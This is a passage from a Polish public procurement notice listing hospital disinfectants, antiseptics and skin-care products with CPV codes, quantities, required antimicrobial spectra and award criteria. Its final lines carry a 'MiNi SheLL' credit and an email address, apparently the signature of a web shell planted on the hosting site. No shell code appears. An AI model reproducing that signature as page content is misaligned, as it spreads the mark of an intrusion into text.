c  bez zawartości chlorheksydyny, jodu i związków amoniowych					
d  zawartość etanolu min. 75g w 100g płynu					
e  spektrum: B, Tbc, MRSA, F, V  Polio, Rota, Adeno, Vaccinia, Herpes simplex, 
HBV, HCV, HIV, Noro, SARS.					
Preparat do odkażania i odtłuszczania skóry przed iniekcjami:	33631600-8	np.Kodan Tinktur Forte  lub równoważny	20	l	1 l
a  bezbarwny, alkoholowy, autosterylny,					
b zawierający min 3 substancje aktywne, w tym difenylol					
c  bez zawartości etanolu, jodu, chlorheksydyny					
d  z dodatkiem nadtlenku wodoru					
e  spektrum:  B, Tbc, MRSA, F, V HIV, HBV, HCV, Herpes Simplex, Rota, Vaccinia			10	l	0,250 l- butelka z atomizerem
Preparat do dezynfekcji i mycia narzędzi chirurgicznych, endoskopów, sprzętu i przyborów medycznych, oraz powierzchni w pomieszczeniach:	24455000-8	np.Gigasept Instru AF lub równoważny	40	l	2 l  
a  spektrum: B Tbc i MRSA, F, V  Adeno, Rota, HBV, HIV, HCV, Vaccinia, Papova SV40,					
b  zawierający substancje chroniące przed korozją					
c  nie zawierający aldehydów, fenoli i związków tlenowych					
d  oparty o minimum trzy substancje aktywne np.  dioctan kokospropylenodiamino-guanidyny,  pochodne alkoholowe(fenoksypropanol lub fenoksyetanol, chlorek benzalkoniowy,					
e  czas działania B( MRSA, Tbc - M. terrae, M. avium, F, V( Rota, HBV, HIV, HCV, Vaccinia w czasie do 30 minut, Adeno, Papova SV40 - do 60 minut					
f  płynny w koncentracie, wyrób medyczny klasy II B					
Preparat do bezbolesnej dezynfekcji ran, błon śluzowych i skóry:	33631600-8	np.Octenisept lub równoważny	6	l	0,250 l - butelka z atomizerem
a spektrum: bakterie łącznie z Chlamydium i Mycoplasma, grzyby,  drożdżaki, pierwotniaki Trichomonas, V  Herpes simplex, inaktywuje HBV i HIV
					
b oparty o: dichlorowodorek octenidyny,
alkohol fenoksyetylowy, octan dimetyloamoniowy, kwas
amidopropylokokosowy, glukonian sodu.
					
c preparat przeznaczony do krótkich zabiegów antyseptycznych 					
d skuteczność: niszczenie mikroorganizmów lub inaktywowanie wirusów po 1 min., działanie utrzymuje się przez co najmniej 1 godz.					
e preparat bezbarwny, pH 6,0					
f nie powoduje uczuleń, nie posiada negatywnego oddziaływania na pierwotne
gojenie się ran					
Preparat do mycia i dezynfekcji powierzchni i sprzętu medycznego:	24455000-8	np. Desam Ox lub równoważny	150	l	5 l
a  na bazie aktywnego tlenu, nie zawiera aldehydów,					
b  przyjemny, delikatny zapach roztworu roboczego,					
c  stosowany również w obecności pacjentów,					
d  niskie stężenie użytkowe,					
e  dobre właściwości myjące,					
f) łagodny dla dezynfekowanych powierzchni, sprzętu,					
g  przyjazny dla środowiska, ulega biodegradacji,					
h  aktywny wobec B,F,Tbc, oraz inaktywuje wirusy HBV/HIV, rota-wirus,					
i  inaktywuje gronkowca MRSA do 2 minut.					
Preparat do dezynfekcji dużych zmywalnych powierzchni, przedmiotów także w kuchenkach oddziałowych:	24455000-8	np. Suma Tab D4 lub równoważny	8	op.	300 tabl. w op.
a  chlorowy w tabletkach 2,7 g,					
b  oparty o dichloroizocyjanuran sodu.					
c  spektrum: B, F, V, Tbc(w stęż. aktywnego chloru do 2000 ppm.					
d  czas działania: B, Tbc, F, V - do 15 min.					
e  wymagana opinia dopuszczająca do dezynfekcji powierzchni kontaktujących się z żywnością,					
Preparat do dezynfekcji małych powierzchni i sprzętu medycznego:	24455000-8	np. Desprej lub równoważny	50	l	0,5 l
a  bezaldehydowy preparat na bazie alkoholi i QAV					
b  szybko dezynfekujący,					
c  roztwór gotowy do użycia					
d  opakowanie z rozpylaczem,					
e  przyjemny zapach,					
f  dobra tolerancja materiałowa,					
g  spektrum B,Tbc,V  tym  Adeno i Polio,F					
h  czas działania  do 1 min.					
Środek dezynfekująco - myjący do wszystkich urządzeń sanitarnych, pojemników na odpady szpitalne, do dezynfekcji powierzchni zanieczyszczonych organicznie i nieorganicznie:	24455000-8	np. Savo Prim lub równoważny	150	l	5 l
a  koncentrat,					
b  działający bakteriobójczo, grzybobójczo, prątkobójczo, wirusobójczo i sporobójczo,					
c  posiadający właściwości wybielające,					
d  o parametrach typu Savo Prim					
Bezalkoholowe chusteczki do mycia i dezynfekcji powierzchni	24455000-8	np. Desam Wipes Soft lub równoważny	15	op	200 szt. w op. tuba
a  na bazie QAV i biguanidu					
b  Spektrum działania B, F, prątki - 1 min, V HIV, HBV, HCV  -5 min					
c  Rozmiar: 21,5cm x 21,5 cm.					
					
			30	op.	wkład 200 szt.
Alkoholowe chusteczki  do dezynfekcji powierzchni i sprzętów	24455000-8	np. Desam Wipes lub równoważny	10	op	100 szt. w op. tuba
a  nasączone mieszanką alkoholi i QAV					
b  dobra tolerancja materiałowa					
c  nie zawierające aldehydów					
d  spektrum B MRSA, F, Tbc, HIV, HBV, HCV.					
e  czas działania 30s, polio, adeno-1min			60	op.	wkład 100 szt.
Delikatny balsam do regeneracji skóry rąk. 	33741000-6	np. Balmea lub równoważny	18	l	500ml
a  chroniący skórę narażoną na częste     wysuszanie, 					
b  działający prewencyjnie przeciwko tworzeniu mikrouszkodzeń,					
c  przeciwdziałający utlenianiu naskórka,					
d  na bazie czystego białego oleju Paraffinum Liquidum ,					
e  posiadający świadectwo Rejestracji Instytutu Medycyny Pracy.					
Pianka czyszcząco-pielęgnująca do czyszczenia i pielęgnacji zanieczyszczonej wydalinami skóry i błon śluzowych:	33741000-6	np. Esemtan Pianka lub równoważny	5	l	500 ml
a   Substancja aktywna: zawiera składniki przeciwbakteryjne i przeciwgrzybiczne, alkohol benzylowy i fenyloetylenowy, delikatne substancje myjące w postaci przyjaznych dla skóry tenzydów, dodatki natłuszczające oraz gaz propan butan wytwarzający idealną konsystencję piany.					
b  Nie powoduje podrażnień skóry i błon śluzowych oraz pochłania nieprzyjemne zapachy					
c  pH 7,					
d  dobre właściwości myjące,					
e  nie powoduje wysuszania skóry					
f Kosmetyk					
Przeciwbakteryjne i przeciwgrzybicze rękawiczki do mycia i pielęgnacji skóry	33741000-6	np. Octenisan rękawice lub równoważny	30	  op.	10 sztuk w op.
a  skuteczność przeciwbakteryjna łącznie przeciw MRSA, ORSA,ESBL+VRE zgodnie z EN 13727 i przeciwgrzybicza Candida albicans zgodnie z EN 13624					
b  zawiera w składzie dichlorowodorek oktenidyny					
c  produkt gotowy do użycia, nie wymaga spłukiwania					
d  zawiera substancję pielęgnującą skórę - alantoinę					
e  możliwość podgrzewania w kuchence mikrofalowej,					
f  utrzymuje naturalne pH skóry ,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.45.50.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com